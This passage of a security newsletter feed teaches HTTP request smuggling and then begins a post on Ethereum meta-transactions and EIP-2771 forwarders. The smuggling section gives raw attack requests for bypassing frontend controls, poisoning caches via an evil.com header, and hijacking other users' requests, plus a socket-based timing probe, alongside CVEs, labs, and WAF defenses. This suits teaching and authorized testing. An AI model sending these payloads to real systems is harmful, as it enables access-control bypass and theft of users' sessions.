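frontend_seen, frontend_rest = consume_by_content_length(body, len(body))
assert frontend_rest == b""

# Backend: the chunked body ends at the 0 chunk, the rest looks like a request
backend_seen, backend_rest = consume_by_chunked(body)
assert backend_rest.startswith(b"GET /admin")  # smuggled request
```

Same bytes, two different boundaries; the backend leftover is exactly the smuggled request.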

### TE.CL (Transfer-Encoding / Content-Length)

The frontend uses `Transfer-Encoding`. The backend uses `Content-Length`.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

```

**What happens**:

1. Frontend sees `Transfer-Encoding: chunked`, reads both chunks and forwards everything
2. Backend sees `Content-Length: 3`, only reads `8\r\n`
3. Backend treats `SMUGGLED\r\n0\r\n\r\n` as the start of a new request

The `SMUGGLED` text is interpreted as an HTTP method (and errors out); in a real attack you&apos;d replace it with a valid request line such as `GET /admin HTTP/1.1`.

### TE.TE (Transfer-Encoding / Transfer-Encoding)

Both servers support `Transfer-Encoding`, but one fails to parse obfuscated headers.

```http
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Transfer-Encoding: x

0

GET /admin HTTP/1.1
X-Ignore: X
```

**Obfuscation techniques**:

```http
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
```

One server processes `chunked`, the other ignores it. The disagreement creates the smuggling opportunity.
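The mechanics are easy to demonstrate. The sketch below (hypothetical parser behaviors for illustration) contrasts a strict parser that requires the exact token with a lenient one that substring-matches, which is precisely the mismatch these obfuscations hunt for:

```python
def strict_is_chunked(value):
    # Spec-faithful: the value must be exactly the "chunked" token
    return value.strip().lower() == "chunked"

def lenient_is_chunked(value):
    # Sloppy real-world behavior: substring match anywhere in the value
    return "chunked" in value.lower()

# "xchunked" slips past the strict parser but triggers the lenient one
assert strict_is_chunked("xchunked") is False
assert lenient_is_chunked("xchunked") is True

# Every value where the two disagree is a potential desync vector
probes = ["chunked", "xchunked", " chunked", "chunked, identity", "x"]
disagreements = [v for v in probes if strict_is_chunked(v) != lenient_is_chunked(v)]
assert disagreements == ["xchunked", "chunked, identity"]
```

Fuzzing a header value list through a pair of models like this is a cheap way to predict which obfuscations are worth sending.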

### TE.0 (New Variant)

[Discovered in 2024](https://portswigger.net/research/breaking-the-chains-on-http-request-smuggler), this variant targets servers that ignore `Transfer-Encoding` entirely, treating body length as zero.

```http
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

GET /admin HTTP/1.1
Host: target.com

```

The frontend processes the chunked body normally. The backend ignores `Transfer-Encoding` and treats the request as having no body. Everything after the headers becomes a new request.

Researchers found this variant affecting thousands of Google Cloud-hosted websites.

## 🔬 Detecting Smuggling Vulnerabilities

### Time-Based Detection

Send a request that should cause a timeout if smuggling exists.

**CL.TE Detection**:

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

1
A
X
```

If vulnerable, the frontend forwards only the first 4 bytes (`1\r\nA`), so the `X` never reaches the backend. The backend parses `1\r\nA` as the start of a chunk and waits for the terminating chunk that never arrives. The request times out.

**TE.CL Detection**:

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 6
Transfer-Encoding: chunked

0

X
```

If vulnerable, the frontend (using chunked encoding) stops at the `0` terminator and never forwards the trailing `X`. The backend, expecting 6 bytes per `Content-Length`, receives only 5 (`0\r\n\r\n`) and waits for the missing byte until the request times out.
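A manual timing probe needs nothing more than a raw socket. The sketch below builds the CL.TE probe from above and times the response; the host, port, and 10-second threshold are illustrative choices, and a timeout alone is a hint, not proof:

```python
import socket
import time

def build_clte_probe(host):
    # CL.TE timing probe: CL forwards 4 bytes, TE backend stalls on the chunk
    return (
        "POST / HTTP/1.1\r\n"
        "Host: " + host + "\r\n"
        "Content-Length: 4\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Connection: close\r\n"
        "\r\n"
        "1\r\nA\r\nX"
    ).encode()

def probe_timing(host, port=80, timeout=10.0):
    # Returns elapsed seconds; hitting the timeout suggests a desync
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        start = time.monotonic()
        s.sendall(build_clte_probe(host))
        try:
            s.recv(4096)
        except socket.timeout:
            pass  # backend stalled waiting for the next chunk
        return time.monotonic() - start

probe = build_clte_probe("target.com")
assert b"Content-Length: 4" in probe
assert probe.endswith(b"1\r\nA\r\nX")
```

Always test the CL.TE probe before the TE.CL one: sending the TE.CL probe to a CL.TE-vulnerable target can poison the connection for other users.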

### Differential Response Detection

Send a smuggled request that alters subsequent responses.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 40
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
Host: target.com
```

Follow with a normal request. If you get a 404 response for a valid URL, the smuggled `/404` request was processed first.

### Automated Tools

- **[HTTP Request Smuggler](https://github.com/PortSwigger/http-request-smuggler)** (Burp Extension): Automated detection of smuggling vulnerabilities
- **[Smuggler](https://github.com/defparam/smuggler)**: Python tool for detecting request smuggling
- **[http2smugl](https://lab.wallarm.com/http2smugl-http2-request-smuggling-security-testing-tool/)**: Tests ~564 combinations of HTTP/2 smuggling techniques

## 🚀 Exploitation Techniques

### Bypassing Security Controls

Many organizations rely on frontend servers to enforce access controls. Smuggling bypasses them entirely.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 61
Transfer-Encoding: chunked

0

GET /admin/delete-user?id=123 HTTP/1.1
Host: target.com
```

The frontend allows `POST /`. The backend processes `GET /admin/delete-user`. The WAF never sees the admin request.

### Cache Poisoning

Force the cache to store malicious content for legitimate URLs. For a deep dive, see [Practical Web Cache Poisoning](https://portswigger.net/research/practical-web-cache-poisoning).

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 87
Transfer-Encoding: chunked

0

GET /static/main.js HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
Foo: x
```

**The attack**:

1. Send this request, then a normal request for a static resource
2. The smuggled request for `/static/main.js` gets processed with `X-Forwarded-Host: evil.com`
3. If the application uses this header to generate absolute URLs, the cached response contains references to `evil.com`
4. Every user fetching `/static/main.js` gets the poisoned version

This turns a single smuggling vulnerability into a mass compromise.

### Request Hijacking

Capture other users&apos; requests by leaving a partial request on the connection.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 71
Transfer-Encoding: chunked

0

POST /log HTTP/1.1
Host: target.com
Content-Length: 400

data=
```

**The attack**:

1. The smuggled `POST /log` declares `Content-Length: 400` but sends only the partial body `data=`
2. The next user&apos;s request (on the same connection) gets appended as the body
3. Their cookies, credentials, and sensitive data get logged

You&apos;re literally stealing other users&apos; HTTP requests.

### Web Cache Deception

Similar to cache poisoning, but targeting user-specific data. See [Web Cache Deception research](https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack.pdf) for background.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 44
Transfer-Encoding: chunked

0

GET /account HTTP/1.1
Host: target.com
```

If the response contains user-specific data and gets cached, you can later access it from the cache.

## 🌐 HTTP/2 Smuggling

HTTP/2 uses binary framing and specifies message length differently. In theory, this eliminates smuggling. In practice, problems arise when HTTP/2 is downgraded to HTTP/1.1.

### HTTP/2 Downgrade Attacks

Many CDNs accept HTTP/2 from clients but forward requests to backends as HTTP/1.1. This translation creates opportunities.

**Injecting Transfer-Encoding**:

The HTTP/2 spec says servers should strip or block `Transfer-Encoding` headers. But some don&apos;t.

```http
:method: POST
:path: /
:authority: target.com
transfer-encoding: chunked

0

GET /admin HTTP/1.1
Host: target.com
```

If the frontend passes `transfer-encoding` through to the HTTP/1.1 backend, you&apos;ve got an H2.TE desync: the frontend determines body length from HTTP/2 framing while the backend honors chunked encoding.

### H2C Smuggling

[HTTP/2 over cleartext (h2c)](https://bishopfox.com/blog/h2c-smuggling-request) upgrade requests can bypass reverse proxy access controls.

```http
GET / HTTP/1.1
Host: target.com
Upgrade: h2c
HTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA
Connection: Upgrade, HTTP2-Settings
```

**The attack**:

1. The proxy forwards the upgrade request to the backend
2. The backend upgrades to HTTP/2
3. Subsequent requests flow directly to the backend via HTTP/2
4. These requests bypass all proxy-level controls

After the upgrade, you have a persistent HTTP/2 connection directly to the backend. The proxy only saw the initial upgrade request.
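h2cSmuggler automates this, but the initial upgrade request is plain HTTP/1.1 and easy to construct by hand. A sketch of the probe follows; the `HTTP2-Settings` value is a base64url-encoded HTTP/2 SETTINGS frame payload, and the single setting used below is an illustrative choice:

```python
import base64

def build_h2c_upgrade(host, settings_payload=b"\x00\x03\x00\x00\x00\x64"):
    # HTTP2-Settings carries a base64url SETTINGS payload with no "=" padding
    settings = base64.urlsafe_b64encode(settings_payload).rstrip(b"=").decode()
    return (
        "GET / HTTP/1.1\r\n"
        "Host: " + host + "\r\n"
        "Upgrade: h2c\r\n"
        "HTTP2-Settings: " + settings + "\r\n"
        "Connection: Upgrade, HTTP2-Settings\r\n"
        "\r\n"
    ).encode()

probe = build_h2c_upgrade("target.com")
assert b"Upgrade: h2c\r\n" in probe
# A "101 Switching Protocols" reply means the backend accepted the upgrade
```

If the reply is `101 Switching Protocols`, the proxy tunneled the upgrade and every subsequent HTTP/2 frame bypasses it.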

**Tools**:
- **[h2cSmuggler](https://github.com/BishopFox/h2csmuggler)**: Detects and exploits h2c upgrade vulnerabilities

## 🛡️ Real-World CVEs

### [CVE-2025-55315](https://nvd.nist.gov/vuln/detail/CVE-2025-55315) (ASP.NET Core) - CVSS 9.9

Microsoft&apos;s highest severity ASP.NET Core vulnerability. Kestrel web server had parsing differences in how `\r`, `\n`, and `\r\n` are treated in chunk extensions.

**Impact**: Account takeover, code injection, SSRF

**Affected**: .NET 8.x and 9.x before October 2025 patches

**Root cause**: Chunk extension parsing allowed attackers to hide a second request within chunk metadata. See [Microsoft&apos;s detailed analysis](https://www.microsoft.com/en-us/msrc/blog/2025/10/understanding-cve-2025-55315) for more.

### [CVE-2025-32094](https://www.akamai.com/blog/security/cve-2025-32094-http-request-smuggling) (Akamai)

HTTP/1.x OPTIONS requests with `Expect: 100-continue` and obsolete line folding could cause parsing discrepancies between Akamai edge servers.

**Status**: Fixed platform-wide with no evidence of exploitation.

### [CVE-2024-6827](https://github.com/advisories/ghsa-hc5x-x2vx-497g) (Gunicorn)

Gunicorn 21.2.0 failed to validate `Transfer-Encoding` header values properly. Invalid values caused fallback to `Content-Length`, creating TE.CL vulnerabilities.

**Impact**: Cache poisoning, session hijacking, SSRF, XSS

**Fixed**: Version 22.0.0

### [CVE-2023-25690](https://httpd.apache.org/security/vulnerabilities_24.html) (Apache HTTP Server)

Some `mod_proxy` configurations on Apache HTTP Server allow HTTP Request Smuggling when RewriteRule or ProxyPassMatch re-inserts user-supplied data into proxied requests using variable substitution.

**Impact**: Bypass access controls, proxy unintended URLs, cache poisoning

**Affected**: Apache 2.4.0 through 2.4.55

**Fixed**: Version 2.4.56

## 🛠️ Tools of the Trade

**[Burp Suite HTTP Request Smuggler](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)**: The essential extension for smuggling detection. Automated scanning with manual verification.

**[Smuggler](https://github.com/defparam/smuggler)**: Command-line scanner that tests multiple techniques automatically.

**[http2smugl](https://github.com/AlfCraft07/http2smugl)**: Specialized for HTTP/2 smuggling. Tests 564 technique combinations.

**[h2cSmuggler](https://github.com/BishopFox/h2csmuggler)**: Detects and exploits H2C upgrade smuggling. Curl-like syntax for easy use.

**[Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943)**: Burp extension for finding hidden parameters. Useful for cache poisoning attacks.

## 🧪 Labs &amp; Practice

**PortSwigger Web Security Academy**:
- [HTTP request smuggling, basic CL.TE vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te)
- [HTTP request smuggling, basic TE.CL vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl)
- [HTTP request smuggling, obfuscating the TE header](https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header)
- [Exploiting HTTP request smuggling to bypass front-end security controls](https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te)
- [Response queue poisoning via H2.TE request smuggling](https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning/lab-h2-response-queue-poisoning-via-te-request-smuggling)

Main resource: [https://portswigger.net/web-security/request-smuggling](https://portswigger.net/web-security/request-smuggling)

**TryHackMe**:
- **[HTTP Request Smuggling](https://tryhackme.com/room/httprequestsmuggling)**: Comprehensive room covering classic variants and detection techniques
- **[HTTP/2 Request Smuggling](https://tryhackme.com/room/http2requestsmuggling)**: HTTP/2 downgrade attacks and H2C smuggling

**Hack The Box**:
- **[Sink](https://app.hackthebox.com/machines/Sink)**: Insane-rated Linux box exploiting HTTP request smuggling between HAProxy and Gunicorn (CVE-2019-18277) to steal session cookies
- **[HTB Academy - HTTP Attacks](https://academy.hackthebox.com/course/preview/http-attacks)**: Comprehensive module covering CRLF injection, request smuggling, and HTTP/2 downgrading

## 🔒 Defense and Detection

### Prevention

**1. Use HTTP/2 End-to-End**

Eliminate the translation layer. HTTP/2&apos;s binary framing doesn&apos;t have the same ambiguity issues.

**2. Normalize Requests at the Edge**

If you must downgrade to HTTP/1.1, ensure the frontend:
- Strips ambiguous headers
- Uses consistent body length determination
- Rejects requests with both `Content-Length` and `Transfer-Encoding`
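A frontend normalization rule can be expressed as a simple predicate. This sketch (illustrative; header names lowercased for comparison) rejects the ambiguous combinations listed above:

```python
def is_ambiguous(headers):
    # headers: list of (name, value) pairs as received on the wire
    names = [n.strip().lower() for n, _ in headers]
    te_values = [v.strip().lower() for n, v in headers
                 if n.strip().lower() == "transfer-encoding"]

    # Both length mechanisms present: reject
    if "content-length" in names and te_values:
        return True
    # Duplicate Content-Length headers: reject
    if names.count("content-length") > 1:
        return True
    # Any Transfer-Encoding value other than the exact "chunked" token: reject
    return any(v != "chunked" for v in te_values)

assert is_ambiguous([("Content-Length", "10"), ("Transfer-Encoding", "chunked")])
assert is_ambiguous([("Transfer-Encoding", "xchunked")])
assert not is_ambiguous([("Content-Length", "10")])
assert not is_ambiguous([("Transfer-Encoding", "chunked")])
```

The key design point: reject and close the connection rather than silently normalizing, so the backend never sees the ambiguous framing at all.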

**3. Configure Servers Consistently**

Both frontend and backend should handle HTTP parsing identically. Test with the same configurations.

**4. Strip Upgrade Headers**

Don&apos;t forward user-supplied `Upgrade` or `Connection` headers. Hardcode them if needed.

```nginx
# Nginx: Strip upgrade headers
proxy_set_header Upgrade &quot;&quot;;
proxy_set_header Connection &quot;&quot;;
```

**5. Disable HTTP/1.0 and Keep-Alive (If Possible)**

Request smuggling requires persistent connections. Disabling them eliminates the attack vector but impacts performance.

### Detection

**Monitor for anomalies**:
- Requests with both `Content-Length` and `Transfer-Encoding`
- Malformed `Transfer-Encoding` values
- Unusual chunk sizes or chunk extensions
- `Upgrade: h2c` requests from untrusted clients

**Web Application Firewall rules**:

```yaml
# ModSecurity example
SecRule REQUEST_HEADERS:Transfer-Encoding &quot;!^chunked$&quot; \
    &quot;id:1,phase:1,deny,status:400,msg:&apos;Invalid Transfer-Encoding&apos;&quot;

SecRule &amp;REQUEST_HEADERS:Content-Length &quot;@gt 1&quot; \
    &quot;id:2,phase:1,deny,status:400,msg:&apos;Multiple Content-Length headers&apos;&quot;
```

**Log analysis**: Look for requests where the frontend and backend logged different URLs or methods.
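That comparison is scriptable if both tiers log a connection ID. A sketch (hypothetical log format: lists of `(connection_id, method, path)` tuples) that flags connections where the backend logged requests the frontend never saw:

```python
def find_desync_suspects(frontend_log, backend_log):
    # Group (method, path) pairs per connection on each tier
    def group(entries):
        grouped = {}
        for conn_id, method, path in entries:
            grouped.setdefault(conn_id, []).append((method, path))
        return grouped

    fe, be = group(frontend_log), group(backend_log)
    # A backend that logged MORE requests than the frontend on the same
    # connection is the classic smuggling signature
    return [conn for conn in be
            if len(be[conn]) > len(fe.get(conn, []))]

frontend_log = [(1, "POST", "/"), (2, "GET", "/index")]
backend_log = [(1, "POST", "/"), (1, "GET", "/admin"), (2, "GET", "/index")]
assert find_desync_suspects(frontend_log, backend_log) == [1]
```

A recurring extra `GET /admin` on the backend tier with no frontend counterpart is exactly the artifact a successful CL.TE attack leaves behind.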

## 🎯 Key Takeaways

- **Request smuggling exploits parsing disagreements** between frontend and backend servers
- **Classic variants** (CL.TE, TE.CL, TE.TE) remain effective against misconfigured infrastructure
- **New variants** like TE.0 continue to emerge, affecting major platforms like Google Cloud
- **HTTP/2 doesn&apos;t eliminate the risk** when downgraded to HTTP/1.1
- **H2C smuggling** can bypass all proxy-level security controls
- **Cache poisoning** turns a single vulnerability into mass compromise
- **Request hijacking** lets you steal other users&apos; credentials and sessions
- **Defense requires consistency** in how frontend and backend parse requests
- **Detection is difficult** because smuggled requests look legitimate to individual servers

## 📚 Further Reading

- **[HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)** (PortSwigger): Comprehensive guide with interactive labs
- **[HTTP Desync Attacks](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)** (James Kettle): The original 2019 research that revived interest in smuggling
- **[HTTP/2: The Sequel is Always Worse](https://portswigger.net/research/http2)** (PortSwigger Research): HTTP/2 downgrade attacks
- **[HackTricks - HTTP Request Smuggling](https://book.hacktricks.xyz/pentesting-web/http-request-smuggling)**: Extensive collection of payloads and techniques
- **[A Pentester&apos;s Guide to HTTP Request Smuggling](https://www.cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling)** (Cobalt): Practical pentesting approach

---

That&apos;s it for this week! Next issue, we&apos;ll explore **Rust Security Code Review**, where we&apos;ll analyze common vulnerability patterns in Rust code including unsafe blocks, integer overflows, panic-based DoS, and memory safety pitfalls that bypass the borrow checker.

If you&apos;re testing web applications behind CDNs, load balancers, or reverse proxies, spend some time with the PortSwigger labs. Practice detecting CL.TE and TE.CL vulnerabilities. The techniques are subtle, but the impact is severe. And remember, scanners often miss these. Manual testing is essential.

Thanks for reading, and happy hacking 🔐

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Meta-Transactions: Gasless UX and New Attack Vectors</title><link>https://www.kayssel.com/post/web3-21</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-21</guid><description>Deep dive into meta-transaction architecture, EIP-2771 trusted forwarders, relayer patterns, and the security implications of gasless transaction execution in Ethereum.</description><pubDate>Wed, 26 Nov 2025 09:00:00 GMT</pubDate><content:encoded>Gas fees kill dApp adoption.

Every on-chain action requires ETH. Users need to navigate exchanges, complete KYC, understand blockchain mechanics, and manage wallets just to try your application. For mainstream adoption, this is a dealbreaker.

Meta-transactions solve the UX problem by decoupling who signs from who pays. A user signs a message off-chain (free, no gas). A relayer submits it on-chain and pays the gas. The smart contract verifies the signature and executes as if the user sent it directly.

Perfect for UX. Terrible for security if you get it wrong.

Meta-transactions introduce new attack surfaces you won&apos;t see in standard transactions. Replay vulnerabilities. Nonce desynchronization. Front-running opportunities. Malicious relayer scenarios. The architecture requires trusting a third party and implementing bulletproof signature verification.

Miss one check, and attackers can drain funds or exploit MEV opportunities.

In this post, we&apos;ll dissect the meta-transaction architecture, examine the EIP-2771 trusted forwarder standard, implement complete working examples, and explore the attack vectors that make this pattern both powerful and dangerous. We&apos;re building on our understanding of [transaction and message signatures](/post/web3-20) to see how they enable gasless UX.

## What Are Meta-Transactions?

Standard Ethereum transactions are simple. The signer pays gas. The signer submits the transaction. One account, one action.

Meta-transactions break that model.

The flow works like this. User signs a message off-chain containing their desired function call and parameters. They send this signed message to a relayer via HTTP. The relayer wraps the signed message in a real transaction, pays the gas, and submits it to a forwarder contract. The forwarder verifies the signature and forwards the call to the target contract. The target contract executes the action as if the original user called it directly.

This enables powerful use cases. Onboard new users without requiring ETH. Let dApps subsidize gas costs. Batch multiple user operations into single transactions for efficiency.

But here&apos;s the catch. The relayer controls when (or if) your transaction gets submitted. They can front-run your action. Censor specific users. Extract MEV. The smart contract must correctly verify signatures and prevent replay attacks.

One mistake compromises the entire system.

## Meta-Transaction Architecture

A complete meta-transaction system has four components.

**User (Signer)**: Creates and signs messages off-chain. Doesn&apos;t pay gas. Doesn&apos;t interact directly with the blockchain.

**Relayer**: Receives signed messages from users, validates them, wraps them in real transactions, pays gas fees, and submits to the blockchain. Can be centralized (single server) or decentralized (network of relayers).

**Forwarder Contract**: Receives transactions from relayers, verifies signatures, manages nonces, and forwards calls to recipient contracts. This is the trust boundary. Must be audited and battle-tested.

**Recipient Contract**: The actual application logic. Receives forwarded calls and must correctly identify the original signer (not the relayer or forwarder). Uses special functions like `_msgSender()` to extract the real sender from calldata.

Here&apos;s how they interact:

```mermaid
sequenceDiagram
    participant U as User Signer
    participant R as Relayer
    participant F as Forwarder
    participant C as Recipient Contract

    Note over U: Off-chain, free
    U-&gt;&gt;U: Sign message with EIP-712
    U-&gt;&gt;R: Send signed message via HTTP

    Note over R: Validates off-chain
    R-&gt;&gt;R: Validate signature

    Note over R,F: On-chain, pays gas
    R-&gt;&gt;F: Submit transaction and pay gas
    activate F

    Note over F: Security checkpoint
    F-&gt;&gt;F: Verify signature and nonce
    F-&gt;&gt;F: Increment nonce

    F-&gt;&gt;C: Forward call with appended sender
    activate C
    C-&gt;&gt;C: Execute as original user
    C--&gt;&gt;F: Return result
    deactivate C

    F--&gt;&gt;R: Transaction receipt
    deactivate F

    R--&gt;&gt;U: Confirm execution via HTTP
```

The security boundary exists at the forwarder contract. Everything before it is off-chain and untrusted. The forwarder must enforce all security invariants: signature verification, nonce management, replay protection.

Once the call reaches the recipient contract, it must trust that the forwarder correctly identified the original signer.

The message structure contains everything needed to reconstruct and verify the intended action. Sender address, recipient contract, function calldata, nonce for replay protection, gas limit, and deadline for time-bound execution. This entire structure gets signed by the user.
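The replay-protection logic can be modeled without any blockchain machinery. The sketch below is a conceptual Python model (signature checking reduced to a simple lookup for illustration); it shows why the nonce must be checked and incremented together with execution:

```python
class ForwarderModel:
    # Conceptual model of a trusted forwarder: verify, check nonce, execute
    def __init__(self, known_signatures):
        self.nonces = {}
        self.known_signatures = known_signatures  # stands in for ECDSA recovery

    def execute(self, request, signature):
        sender = request["from"]
        # A valid signature must cover the sender AND the expected nonce
        if self.known_signatures.get(signature) != (sender, request["nonce"]):
            return "invalid signature"
        if self.nonces.get(sender, 0) != request["nonce"]:
            return "bad nonce"
        # Increment BEFORE the forwarded call (checks-effects-interactions)
        self.nonces[sender] = request["nonce"] + 1
        return "executed"

sigs = {"0xsig": ("0xalice", 0)}
fwd = ForwarderModel(sigs)
req = {"from": "0xalice", "nonce": 0, "data": "transfer(...)"}

assert fwd.execute(req, "0xsig") == "executed"
# Replaying the identical signed message now fails the nonce check
assert fwd.execute(req, "0xsig") == "bad nonce"
```

Because the nonce is part of the signed payload, a captured signature is only ever valid for one state of the forwarder; replaying it is harmless.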

## EIP-2771: Trusted Forwarder Standard

[EIP-2771](https://eips.ethereum.org/EIPS/eip-2771) standardizes the trusted forwarder pattern. It defines how forwarders structure calls and how recipient contracts extract the original sender from calldata.

The key innovation is elegant. Append the original sender address to the end of the calldata. When the forwarder calls the recipient, it encodes the user&apos;s address in the last 20 bytes. The recipient contract checks if the caller is a trusted forwarder. If so, it reads the original sender from calldata instead of using `msg.sender`.

This is implemented through the `_msgSender()` pattern. Instead of using `msg.sender` directly, contracts use a helper function that checks if the call came from a trusted forwarder:

```solidity
function _msgSender() internal view returns (address sender) {
    // If called by trusted forwarder, extract original sender from calldata
    if (msg.sender == trustedForwarder &amp;&amp; msg.data.length &gt;= 20) {
        // Original sender is appended as last 20 bytes
        assembly {
            // calldataload(pos) loads 32 bytes starting at pos
            // We load from position (calldatasize - 20) to get the last 20 bytes
            // Then shift right 96 bits (12 bytes) to get just the address
            sender := shr(96, calldataload(sub(calldatasize(), 20)))
        }
    } else {
        // Standard call, use msg.sender
        sender = msg.sender;
    }
}
```
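The assembly is easier to follow with a byte-level rehearsal. This Python sketch mimics `calldataload` (a 32-byte, zero-padded read) and the 96-bit shift, showing that the combination recovers exactly the appended address (the selector and argument bytes are illustrative):

```python
def calldataload(calldata, offset):
    # EVM calldataload: read 32 bytes at offset, zero-padded past the end
    word = calldata[offset:offset + 32].ljust(32, b"\x00")
    return int.from_bytes(word, "big")

def extract_sender(calldata):
    # Load the word that starts 20 bytes before the end of calldata...
    word = calldataload(calldata, len(calldata) - 20)
    # ...then shift right 96 bits (12 bytes) so only the address remains
    return (word >> 96).to_bytes(20, "big")

selector_and_args = bytes.fromhex("a9059cbb") + b"\x00" * 64  # illustrative
sender = bytes.fromhex("deadbeef" * 5)  # a 20-byte address

calldata = selector_and_args + sender  # EIP-2771: sender appended last
assert extract_sender(calldata) == sender
```

The 20-byte read lands partly past the end of calldata, so `calldataload` pads with 12 zero bytes on the right; the `shr(96, ...)` discards exactly that padding.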

The forwarder contract itself is relatively simple. It maintains nonces for each user, verifies signatures, and forwards calls with the sender appended. Here&apos;s a minimal implementation based on OpenZeppelin&apos;s pattern:

**⚠️ Important**: This `MinimalForwarder` implementation is from **OpenZeppelin Contracts v4.x** and is primarily for **educational and testing purposes**. OpenZeppelin explicitly states it&apos;s &quot;missing features to be a good production-ready forwarder.&quot; In **v5.x**, `MinimalForwarder` was removed entirely. For production deployments, use:
- **[OpenZeppelin&apos;s `ERC2771Forwarder`](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/metatx/ERC2771Forwarder.sol)** (v5.x) with deadline enforcement, batch processing, and additional security features
- **[Gas Station Network (GSN)](https://docs.opengsn.org/)** or other established relayer services like [Biconomy](https://docs.biconomy.io/) or [Gelato](https://docs.gelato.network/developer-services/relay)

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete MinimalForwarder Implementation&lt;/strong&gt;&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import &quot;@openzeppelin/contracts/utils/cryptography/ECDSA.sol&quot;;
import &quot;@openzeppelin/contracts/utils/cryptography/EIP712.sol&quot;;

/**
 * @title MinimalForwarder
 * @notice EIP-2771 trusted forwarder for meta-transactions
 * @dev Verifies signatures and forwards calls with original sender appended
 */
contract MinimalForwarder is EIP712 {
    using ECDSA for bytes32;

    // Type hash for ForwardRequest struct (EIP-712)
    bytes32 public constant FORWARD_REQUEST_TYPEHASH =
        keccak256(
            &quot;ForwardRequest(address from,address to,uint256 value,uint256 gas,uint256 nonce,bytes data)&quot;
        );

    struct ForwardRequest {
        address from;      // Original signer (user)
        address to;        // Recipient contract
        uint256 value;     // ETH value to send
        uint256 gas;       // Gas limit for forwarded call
        uint256 nonce;     // Replay protection
        bytes data;        // Function calldata
    }

    // PROTECTION: Per-user nonces prevent replay attacks
    mapping(address =&gt; uint256) private _nonces;

    event MetaTransactionExecuted(
        address indexed from,
        address indexed to,
        bytes data,
        bool success
    );

    constructor() EIP712(&quot;MinimalForwarder&quot;, &quot;0.0.1&quot;) {}

    /**
     * @notice Get current nonce for an address
     * @param from Address to query
     * @return Current nonce value
     */
    function getNonce(address from) public view returns (uint256) {
        return _nonces[from];
    }

    /**
     * @notice Verify a forward request signature
     * @param req The forward request struct
     * @param signature The signature to verify
     * @return True if signature is valid
     */
    function verify(
        ForwardRequest calldata req,
        bytes calldata signature
    ) public view returns (bool) {
        // VALIDATION: Check nonce matches current state
        if (_nonces[req.from] != req.nonce) {
            return false;
        }

        // Build EIP-712 typed data hash
        bytes32 structHash = keccak256(
            abi.encode(
                FORWARD_REQUEST_TYPEHASH,
                req.from,
                req.to,
                req.value,
                req.gas,
                req.nonce,
                keccak256(req.data)
            )
        );

        bytes32 digest = _hashTypedDataV4(structHash);

        // SECURITY: Recover signer and verify it matches claimed sender
        address signer = digest.recover(signature);
        return signer == req.from;
    }

    /**
     * @notice Execute a forward request
     * @param req The forward request to execute
     * @param signature Signature from original sender
     * @return success Whether the forwarded call succeeded
     * @return returndata Data returned by forwarded call
     */
    function execute(
        ForwardRequest calldata req,
        bytes calldata signature
    ) public payable returns (bool success, bytes memory returndata) {
        // SECURITY: Verify signature and request validity
        require(verify(req, signature), &quot;MinimalForwarder: signature invalid&quot;);

        // DEFENSE: Increment nonce before external call (checks-effects-interactions)
        _nonces[req.from]++;

        // EIP-2771: Append original sender to calldata
        bytes memory callData = abi.encodePacked(req.data, req.from);

        // Execute forwarded call with specified gas limit
        // NOTE: Nonce increments regardless of call success (similar to Ethereum account nonces)
        // This prevents nonce blocking if a call fails
        (success, returndata) = req.to.call{gas: req.gas, value: req.value}(
            callData
        );

        // SECURITY: Post-execution gas check (EIP-150 63/64 rule)
        // Ensures the parent call retained at least 1/64 of the forwarded gas
        // Note: This check occurs AFTER the call executes and nonce increments
        // It prevents gas griefing but cannot prevent nonce consumption if gas runs out
        require(
            gasleft() &gt; req.gas / 63,
            &quot;MinimalForwarder: insufficient gas forwarded&quot;
        );

        emit MetaTransactionExecuted(req.from, req.to, req.data, success);

        return (success, returndata);
    }
}
```

&lt;/details&gt;

The recipient contract must be aware of the trusted forwarder. Here&apos;s a simple example that demonstrates the pattern:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract RecipientContract {
    address public immutable trustedForwarder;
    mapping(address =&gt; uint256) public balances;

    constructor(address _forwarder) {
        trustedForwarder = _forwarder;
    }

    /**
     * @notice Extract the original sender from calldata
     * @dev Implements EIP-2771 pattern
     *
     * Calldata structure when called via forwarder:
     * [function selector (4 bytes)][function args (n bytes)][sender address (20 bytes)]
     *
     * Assembly breakdown:
     * 1. calldatasize() - returns total calldata length in bytes
